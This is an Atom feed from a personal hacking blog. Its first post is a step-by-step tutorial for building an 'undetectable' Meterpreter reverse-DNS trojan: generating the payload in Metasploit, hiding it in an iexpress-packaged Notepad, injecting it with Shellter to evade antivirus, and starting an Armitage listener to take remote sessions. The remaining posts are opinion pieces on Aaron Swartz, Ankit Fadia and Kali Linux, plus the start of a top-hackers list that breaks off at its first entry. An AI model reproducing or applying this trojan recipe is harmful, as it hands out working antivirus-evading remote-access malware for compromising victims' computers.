<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-991668941167356653</id><updated>2024-12-18T19:21:25.481-08:00</updated><category term="Tech News"/><category term="Hacking News"/><category term="Aaron Swartz"/><category term="Digital India"/><category term="Domain Exploit"/><category term="Hacker Died"/><category term="Hacker Story"/><category term="Hacking Articles"/><category term="Inspirational"/><category term="Interesting"/><category term="Internet"/><category term="Linux Kali"/><category term="Motivational"/><category term="US Government"/><category term="Undetectable trojan"/><title type='text'>Techy Gang</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://techygang.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/991668941167356653/posts/default'/><link rel='alternate' type='text/html' href='http://techygang.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Vivek Singh</name><uri>http://www.blogger.com/profile/03820533605943035046</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>5</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-991668941167356653.post-6282531792913745578</id><published>2016-08-20T23:31:00.001-07:00</published><updated>2016-08-20T23:38:35.796-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Domain Exploit"/><category scheme="http://www.blogger.com/atom/ns#" term="Linux Kali"/><category scheme="http://www.blogger.com/atom/ns#" term="Undetectable trojan"/><title type='text'>Create an Undetectable Trojan Using a Domain Name</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;color: #383838;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-size: 17px; font-variant-ligatures: no-common-ligatures; letter-spacing: 0.17px; line-height: 25.5px; word-spacing: 1.7px;&quot;&gt;Before starting up i have few things to say. I am not a hacker, i just re-edit posts and make them&amp;nbsp;convenient&amp;nbsp;to understand. Though i am not a dumb ass. I know &quot; THINGS&quot; . Anyway let&#39;s start hoping that you know what kali and meterpreter is. :)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;color: #383838; font-family: &amp;quot;slabo&amp;quot; , &amp;quot;helvetica neue&amp;quot; , &amp;quot;helvetica&amp;quot; , &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;background-color: white; font-size: 17px; font-variant-ligatures: no-common-ligatures; letter-spacing: 0.17px; line-height: 25.5px; word-spacing: 1.7px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;color: #383838; font-family: &amp;quot;slabo&amp;quot; , &amp;quot;helvetica neue&amp;quot; , &amp;quot;helvetica&amp;quot; , &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;background-color: white; font-size: 17px; font-variant-ligatures: no-common-ligatures; letter-spacing: 0.17px; line-height: 25.5px; word-spacing: 1.7px;&quot;&gt;In this tutorial I am going to show you how to create an undetectable Meterpreter Trojan using a Domain name. I have taken a few guides/tutorials and built it into one. The first part is creating the DNS Payload. The second part is creating the Executable file. Part 3 is using both in Shellter to create your undetectable Trojan. Part 4 is setting up your listener using Armitage.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #383838; font-family: &amp;quot;slabo&amp;quot; , &amp;quot;helvetica neue&amp;quot; , &amp;quot;helvetica&amp;quot; , &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;background-color: white; font-size: 17px; font-variant-ligatures: no-common-ligatures; letter-spacing: 0.17px; line-height: 25.5px; word-spacing: 1.7px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibsbuYtXVUu0dDCaJ675VpRTNDL8_dRS06cuxmmfKL9muMBVp768q8jBdr0MQH3jzn49rk3kMKZKar8xvj5rd-FzCmMlmYnuU_VxB5W7O_-tFCsjZyIq4jQtUx39lNJR-KAK2BIC1UVnl8/s1600/create-undetectable-trojan-using-domain-name.1280x600.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;300&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibsbuYtXVUu0dDCaJ675VpRTNDL8_dRS06cuxmmfKL9muMBVp768q8jBdr0MQH3jzn49rk3kMKZKar8xvj5rd-FzCmMlmYnuU_VxB5W7O_-tFCsjZyIq4jQtUx39lNJR-KAK2BIC1UVnl8/s640/create-undetectable-trojan-using-domain-name.1280x600.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;color: #383838; font-family: &amp;quot;slabo&amp;quot; , &amp;quot;helvetica neue&amp;quot; , &amp;quot;helvetica&amp;quot; , &amp;quot;arial&amp;quot; , sans-serif;&quot;&gt;&lt;span style=&quot;background-color: white; font-size: 17px; font-variant-ligatures: no-common-ligatures; letter-spacing: 0.17px; line-height: 25.5px; word-spacing: 1.7px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;/h2&gt;
&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: #383838;&quot;&gt;&lt;span style=&quot;font-size: 17px; font-variant-ligatures: no-common-ligatures; letter-spacing: 0.17px; line-height: 25.5px; word-spacing: 1.7px;&quot;&gt;Things You Will Need:&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style=&quot;color: #383838; font-size: 17px; letter-spacing: 0.17px; line-height: 25.5px; word-spacing: 1.7px;&quot;&gt;Kali Linux&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #383838; font-size: 17px; letter-spacing: 0.17px; line-height: 25.5px; word-spacing: 1.7px;&quot;&gt;Windows&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #383838; font-size: 17px; letter-spacing: 0.17px; line-height: 25.5px; word-spacing: 1.7px;&quot;&gt;A No IP account with a domain name&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #383838; font-size: 17px; letter-spacing: 0.17px; line-height: 25.5px; word-spacing: 1.7px;&quot;&gt;A forwarded port on your router&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;color: #383838; font-size: 17px; letter-spacing: 0.17px; line-height: 25.5px; word-spacing: 1.7px;&quot;&gt;&lt;a href=&quot;http://shellterproject.com/&quot; target=&quot;_blank&quot;&gt;Shellter&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;u&gt;
Part 1: Creating the DNS Payload Using Kali:&lt;/u&gt;&lt;/h3&gt;
&lt;div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;ol&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Open Metasploit on Kali by typing msfconsole in a terminal.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Type use payload/windows/meterpreter/reverse_tcp_dns.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Type show options. This will show you that you need to set your lhost and lport.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Type set lhost (hostname you created, without http://).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Type set lport (port you have forwarded on your router set for the Kali machine).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Type generate -h. This will show you the options for generating the payload. &lt;br /&gt;You can choose different options but at least do the following.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Type generate -f (file name you choose for the payload) -p windows -t raw. &lt;br /&gt;Ex. generate -f DNS -p windows -t raw&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Exit the terminal and click on Files. Your payload will be in your Home &lt;br /&gt;(Unless you set an option for a different location).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Transfer the created payload to Windows. (Be aware that your AV might detect it at its current state).&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;u&gt;Part 2: Creating the Executable File in Windows&lt;/u&gt;&lt;/h3&gt;
&lt;div&gt;
&lt;ol&gt;
&lt;li&gt;Choose option that applies to you. (Important as Shellter does not work with 64-bit executables).&lt;/li&gt;
&lt;li&gt;32-bit Windows - Navigate to C:\Windows\System32\iexpress.exe (Right click and select run as administrator)&lt;/li&gt;
&lt;li&gt;64-bit Windows - Navigate to C:\Windows\SysWOW64\iexpress.exe (Right click and select run as administrator)&lt;/li&gt;
&lt;li&gt;Choose Create new Self Extraction Directive File and click next.&lt;/li&gt;
&lt;li&gt;Click next on the Package Purpose page.&lt;/li&gt;
&lt;li&gt;Type the title of the package. (This can be anything you want) Ex: Notepad.exe&lt;/li&gt;
&lt;li&gt;No Prompt, click next.&lt;/li&gt;
&lt;li&gt;Do not display a license. Click next.&lt;/li&gt;
&lt;li&gt;Click Add and choose any file on your computer. I choose Notepad.exe in the C:\Windows\System32 folder. Click Next.&lt;/li&gt;
&lt;li&gt;Click the drop arrow and choose the file name you choose on the last screen. Click Next.&lt;/li&gt;
&lt;li&gt;Choose Hidden and then click next.&lt;/li&gt;
&lt;li&gt;No Message. Click Next&lt;/li&gt;
&lt;li&gt;Click Browse and type a name for your malware file and a destination. Check the Hide File Extracting Progress Animation from user. Click Next.&lt;/li&gt;
&lt;li&gt;Select No restart and then click next.&lt;/li&gt;
&lt;li&gt;You can then either choose to save the self extraction directive or don&#39;t save. Click Next.&lt;/li&gt;
&lt;li&gt;Click Next again on the create Package. Then click Finish.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;u&gt;Part 3: Using Both Created Files in Shellter to Create Your Trojan&lt;/u&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ol&gt;
&lt;li&gt;Open the folder that Shellter is in. Right click on Shellter.exe and click Run as Administrator.&lt;/li&gt;
&lt;li&gt;Type A for Auto.&lt;/li&gt;
&lt;li&gt;Type N for No.&lt;/li&gt;
&lt;li&gt;Type the location of your created EXE file from Part 2 and hit enter. Let Shellter do it&#39;s thing for 30 seconds to a minute.&lt;/li&gt;
&lt;li&gt;When asked to choose payload, type C for custom.&lt;/li&gt;
&lt;li&gt;Type the location of your created payload in Part 1 and hit enter.&lt;/li&gt;
&lt;li&gt;Type N for No reflective DLL loader.&lt;/li&gt;
&lt;li&gt;Hit enter and let Shellter finish doing it&#39;s thing If it says Injection Verified! you should have a working undetectable Trojan.&lt;/li&gt;
&lt;li&gt;Hit enter to exit Shellter.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;u&gt;Part 4: Set Up Your Listener&lt;/u&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt;
You can either use Metasploit or Armitage. I prefer Armitage so my tutorial will be for that.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;ol&gt;
&lt;li&gt;Go back to Kali.&lt;/li&gt;
&lt;li&gt;Open Terminal and type Msfupdate&lt;/li&gt;
&lt;li&gt;Once it&#39;s done type apt-get install armitage.&lt;/li&gt;
&lt;li&gt;Type msfdb init&lt;/li&gt;
&lt;li&gt;Open Armitage&lt;/li&gt;
&lt;li&gt;Click Connect&lt;/li&gt;
&lt;li&gt;Click Yes&lt;/li&gt;
&lt;li&gt;Once Armitage opens type: use exploit/multi/handler&lt;/li&gt;
&lt;li&gt;Type set lhost 0.0.0.0&lt;/li&gt;
&lt;li&gt;Type set lport (your port you forwarded in your router)&lt;/li&gt;
&lt;li&gt;Type set payload windows/meterpreter/reverse tcp dns&lt;/li&gt;
&lt;li&gt;Type set exitonsession false&lt;/li&gt;
&lt;li&gt;(Optional.) Type set autorunscript migrate -f&lt;/li&gt;
&lt;li&gt;(Optional.) Type set prependmigrate True&lt;/li&gt;
&lt;li&gt;Type exploit -j&lt;/li&gt;
&lt;/ol&gt;
&lt;div&gt;
&lt;div&gt;
(Optional steps are to migrate the process automatically so the session does not end before you can do it manually)&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Now you should be able to run your undetectable Trojan and get a Meterpreter session.&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;color: #383838;&quot;&gt;&lt;span style=&quot;background-color: white; font-size: 17px; font-variant-ligatures: no-common-ligatures; letter-spacing: 0.17px; line-height: 25.5px; word-spacing: 1.7px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://techygang.blogspot.com/feeds/6282531792913745578/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techygang.blogspot.com/2016/08/create-undetectable-trojan-using-domain.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/991668941167356653/posts/default/6282531792913745578'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/991668941167356653/posts/default/6282531792913745578'/><link rel='alternate' type='text/html' href='http://techygang.blogspot.com/2016/08/create-undetectable-trojan-using-domain.html' title='Create an Undetectable Trojan Using a Domain Name'/><author><name>Vivek Singh</name><uri>http://www.blogger.com/profile/03820533605943035046</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibsbuYtXVUu0dDCaJ675VpRTNDL8_dRS06cuxmmfKL9muMBVp768q8jBdr0MQH3jzn49rk3kMKZKar8xvj5rd-FzCmMlmYnuU_VxB5W7O_-tFCsjZyIq4jQtUx39lNJR-KAK2BIC1UVnl8/s72-c/create-undetectable-trojan-using-domain-name.1280x600.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-991668941167356653.post-7837211587361833168</id><published>2015-12-24T09:31:00.000-08:00</published><updated>2016-01-31T01:11:35.330-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Aaron Swartz"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker Died"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker Story"/><category scheme="http://www.blogger.com/atom/ns#" term="Interesting"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Motivational"/><category scheme="http://www.blogger.com/atom/ns#" term="Tech News"/><category scheme="http://www.blogger.com/atom/ns#" term="US Government"/><title type='text'>Aaron Swartz - A Guy Who Wanted To Change This Mean World</title><content type='html'>I am pretty sure that you would have not heard this name before. Aaron Swartz , isn&#39;t it an ordinary name to you?Well it was to me till today ! But now it isn&#39;t just a name to me. He is the guy whom i&#39;ll see as motivation.&lt;br/&gt;&lt;br/&gt;Let&#39;s begin with who he was. Aaron Swarts was a brilliant boy with ideas to change this world. He wanted freedom of speech on Internet . He was the one who invented RSS feeds, CC and contributed in other technologies . He wanted that knowledge on internet should be free , one should not protect it to earn money. It&#39;s our right to read documents or anything on internet for free.&lt;br/&gt;&lt;br/&gt;&lt;span style=&quot;line-height: 1.5;&quot;&gt;&lt;a href=&quot;http://techygang.com/aaron-swartz-a-guy-who-wanted-to-change-this-mean-world/aaronswartzny/&quot; rel=&quot;attachment wp-att-1063&quot;&gt;&lt;img class=&quot;alignnone wp-image-1063 size-full&quot; src=&quot;http://techygang.com/wp-content/uploads/2015/12/AaronSwartzNY.jpg&quot; alt=&quot;Aaron Swartz Story&quot; width=&quot;960&quot; height=&quot;636&quot; /&gt;&lt;/a&gt;So this guy hacked into MIT and downloaded thousand of journal articles. Yes , it was illegal but he did it for a good cause. Anyway , it wasn&#39;t a big deal.Cops should have given him warning and should have left him. But things don&#39;t go as we plan. For no good reason Aaron was filed with 13 charges , FBI and Secret Service of US took over this case. Obviously they were over reacting on it. This wasn&#39;t a threat to US or wasn&#39;t that harmful act by Aaron.&lt;/span&gt;&lt;br/&gt;&lt;br/&gt;[Tweet &quot;Aaron Swartz- The Guy Who Wanted To Change The World&quot;]&lt;br/&gt;&lt;br/&gt;Anyway Aaron fought against them , in meanwhile SOPA bill came , in this bill Net Neutrality was in danger . So Aaron reacted on it and after a huge fight he made it. He did not let this bill pass.&lt;br/&gt;&lt;br/&gt;But he failed to get through the cases he was charged with. Swartz, 26, was under indictment when he committed suicide in January 2013.Some people say that government killed Aaron Swartz .&lt;br/&gt;&lt;br/&gt;Whatever it was , but this guy was a true hero. He fought for freedom , which was his birth right. He wanted to change the world. But in return he got death. That&#39;s how this world works.&lt;br/&gt;&lt;br/&gt;I can&#39;t write his whole story here but i wanted you people to watch his documentary. Watch it for yourself.&lt;br/&gt;&lt;br/&gt;&lt;iframe src=&quot;https://www.youtube.com/embed/nILqr8UlpPM&quot; width=&quot;560&quot; height=&quot;315&quot; frameborder=&quot;0&quot; allowfullscreen=&quot;allowfullscreen&quot;&gt;&lt;/iframe&gt;</content><link rel='replies' type='application/atom+xml' href='http://techygang.blogspot.com/feeds/7837211587361833168/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techygang.blogspot.com/2015/12/aaron-swartz-guy-who-wanted-to-change.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/991668941167356653/posts/default/7837211587361833168'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/991668941167356653/posts/default/7837211587361833168'/><link rel='alternate' type='text/html' href='http://techygang.blogspot.com/2015/12/aaron-swartz-guy-who-wanted-to-change.html' title='Aaron Swartz - A Guy Who Wanted To Change This Mean World'/><author><name>Vivek Singh</name><uri>http://www.blogger.com/profile/03820533605943035046</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img.youtube.com/vi/nILqr8UlpPM/default.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-991668941167356653.post-8674357126799676443</id><published>2015-09-28T11:52:00.000-07:00</published><updated>2015-09-28T11:52:17.099-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Digital India"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking News"/><title type='text'>‎Fake ‎hacker‬ Ankit Fadia appointed as brand ambassador for ‪Digital‬ ‪India‬ ‪Mission</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Ankit Fadia is well known ethical hacker in India. Though he is fake and is not a genuine hacker ( he knows some google tricks though :D ) . He is assigned as Brand Ambassador of whole Digital India Mission for 1 year.&lt;br /&gt;
&lt;br /&gt;
I really don&#39;t know why he was chosen as brand ambassador. India have lot of high tech brains working in top tech companies. They would have chosen someone who deserves this post. Anyway , he is now chosen and we will have to hear from him for whole year. I am sure he is not going to appear in some hack summit.&lt;br /&gt;
&lt;br /&gt;
I remember one interview where he told reporter that he was with FBI and CIA , helping them in tracing back Osama Bin Laden . That was the best hacking joke i ever heard. Few days after a kid hacked his website .&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlSj8j2KnhvvZjc1bcyW8DwLcoLDuo336JgT1Wf5TLLM-X4IDhsbcf_omy9ZVit49suX6ugSRfxf8K9zLAFFka9tghhc3RQGUM7QUJsjAEZXAdrVZzHApytyCUP72ll3xCYPjXcNaOZEfw/s1600/ankit-fadia-site-hacked.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;348&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlSj8j2KnhvvZjc1bcyW8DwLcoLDuo336JgT1Wf5TLLM-X4IDhsbcf_omy9ZVit49suX6ugSRfxf8K9zLAFFka9tghhc3RQGUM7QUJsjAEZXAdrVZzHApytyCUP72ll3xCYPjXcNaOZEfw/s640/ankit-fadia-site-hacked.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
overall i am pissed of right now because he is not any hacker. He is just a normal guy with some tricks. There are so many people in India who deserve this post.&lt;br /&gt;
&lt;br /&gt;
This Digital India Mission is seriously getting trolled. First Facebook trolled by cheating whole campaign &lt;a href=&quot;http://techygang.com/facebook-cheated-on-supportdigitalindia/&quot; target=&quot;_blank&quot;&gt;&amp;gt;&amp;gt; Read Here How ?&lt;/a&gt;&amp;nbsp;and now him .. -_-&lt;br /&gt;
&lt;span id=&quot;goog_1436156894&quot;&gt;&lt;/span&gt;&lt;span id=&quot;goog_1436156895&quot;&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://techygang.blogspot.com/feeds/8674357126799676443/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techygang.blogspot.com/2015/09/fake-hacker-ankit-fadia-appointed-as.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/991668941167356653/posts/default/8674357126799676443'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/991668941167356653/posts/default/8674357126799676443'/><link rel='alternate' type='text/html' href='http://techygang.blogspot.com/2015/09/fake-hacker-ankit-fadia-appointed-as.html' title='‎Fake ‎hacker‬ Ankit Fadia appointed as brand ambassador for ‪Digital‬ ‪India‬ ‪Mission'/><author><name>Vivek Singh</name><uri>http://www.blogger.com/profile/03820533605943035046</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlSj8j2KnhvvZjc1bcyW8DwLcoLDuo336JgT1Wf5TLLM-X4IDhsbcf_omy9ZVit49suX6ugSRfxf8K9zLAFFka9tghhc3RQGUM7QUJsjAEZXAdrVZzHApytyCUP72ll3xCYPjXcNaOZEfw/s72-c/ankit-fadia-site-hacked.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-991668941167356653.post-1417024945863370637</id><published>2015-09-18T09:56:00.000-07:00</published><updated>2015-09-18T09:56:13.597-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Articles"/><category scheme="http://www.blogger.com/atom/ns#" term="Tech News"/><title type='text'>Best Operating System For Hacking Purpose.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
I am not a hacker. But yes ! I do have some knowledge in this field. 
When i was of 14 , i came to know what hacking is . From that very day 
it’s something which attracted me a lot. In starting i simply read 
stories about people did some cool hacks in there colleges or offices. I
 was amazed !! I too tried but i didn’t have any coding experience so it
 was limited till spoofing people.&lt;br /&gt;

&lt;div style=&quot;text-align: center;&quot;&gt;
Download &lt;a href=&quot;https://www.kali.org/downloads/&quot; target=&quot;_blank&quot;&gt;Linux KALI&lt;/a&gt;&lt;/div&gt;
Till now i am using windows , but you know what ? Windows is not 
right operating system to hack with. Microsoft Windows don’t allow there
 user access to Terminal . In common language , you may be the admin of 
your computer ; but in actual you are not. Anyway ! i have watched a lot
 of hacking related stuff. Searched Youtube , watched movies etc. And 
few days ago i started watching a tv show about life of hacker. There i 
noticed something , none of these movies, shows or on youtube. The 
hacker did not use Windows Operating System.&lt;br /&gt;
&lt;br /&gt;

&lt;br /&gt;
&lt;a href=&quot;http://techygang.com/wp-content/uploads/2015/09/computer-file.png&quot;&gt;&lt;img alt=&quot;H&quot; class=&quot;size-full wp-image-808 aligncenter&quot; height=&quot;334&quot; src=&quot;http://techygang.com/wp-content/uploads/2015/09/computer-file.png&quot; width=&quot;600&quot; /&gt;&amp;nbsp;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;

I researched a lot and came to know that LINUX is one and only 
operating system you should trust. There are lot of version of linux, 
one of them is KALI Linux . Kali linux is specifically designed for 
hackers , you can use terminal like every other linux operating system 
but in addition there are lot of add on tools.&lt;br /&gt;

Best of all , Linux Kali is free of cost and it will be free. I 
haven’t used it yet ! but yes , i am downloading it and will learn it. 
So bro , give it a start and if you are really into hacking stuff then 
install it and start learning Coding !&lt;br /&gt;

&lt;br /&gt;

Xao !
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://techygang.blogspot.com/feeds/1417024945863370637/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techygang.blogspot.com/2015/09/best-operating-system-for-hacking.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/991668941167356653/posts/default/1417024945863370637'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/991668941167356653/posts/default/1417024945863370637'/><link rel='alternate' type='text/html' href='http://techygang.blogspot.com/2015/09/best-operating-system-for-hacking.html' title='Best Operating System For Hacking Purpose.'/><author><name>Vivek Singh</name><uri>http://www.blogger.com/profile/03820533605943035046</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-991668941167356653.post-4954061651467689508</id><published>2015-09-18T08:42:00.002-07:00</published><updated>2015-09-18T08:42:37.632-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking News"/><category scheme="http://www.blogger.com/atom/ns#" term="Inspirational"/><category scheme="http://www.blogger.com/atom/ns#" term="Tech News"/><title type='text'>10 Best Hacker The World Has Ever Known.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
Hacker ! This word always gain&amp;nbsp;my interest. I have been watching a lot of movies and tv shows, where hackers did most of the action with there computer. Like Agent of S.H.I.E.L.D , Die Hard 4 and so on. After watching all these movies and shows i always wanted to be them !! But it’s not that easy and of course we all know the consequences of doing the ” illegal thing” .&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
Anyway today i am writing about top 10 hackers ever known. From Best Military Security to a Banking Security , they hacked everything and totally nailed it. But in end all of them were caught , so don’t try this at home &amp;nbsp;( lol ).&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; border: 0px; color: #444444; font-family: Ubuntu, Arial, sans-serif; font-size: 34px; font-stretch: inherit; font-weight: 400; letter-spacing: -0.7px; line-height: 1.3em; margin: 0px 0px 14px; padding: 0px; text-align: center; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
&lt;span style=&quot;border: 0px; color: maroon; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;1. Gary McKinnon&lt;/span&gt;&lt;/h2&gt;
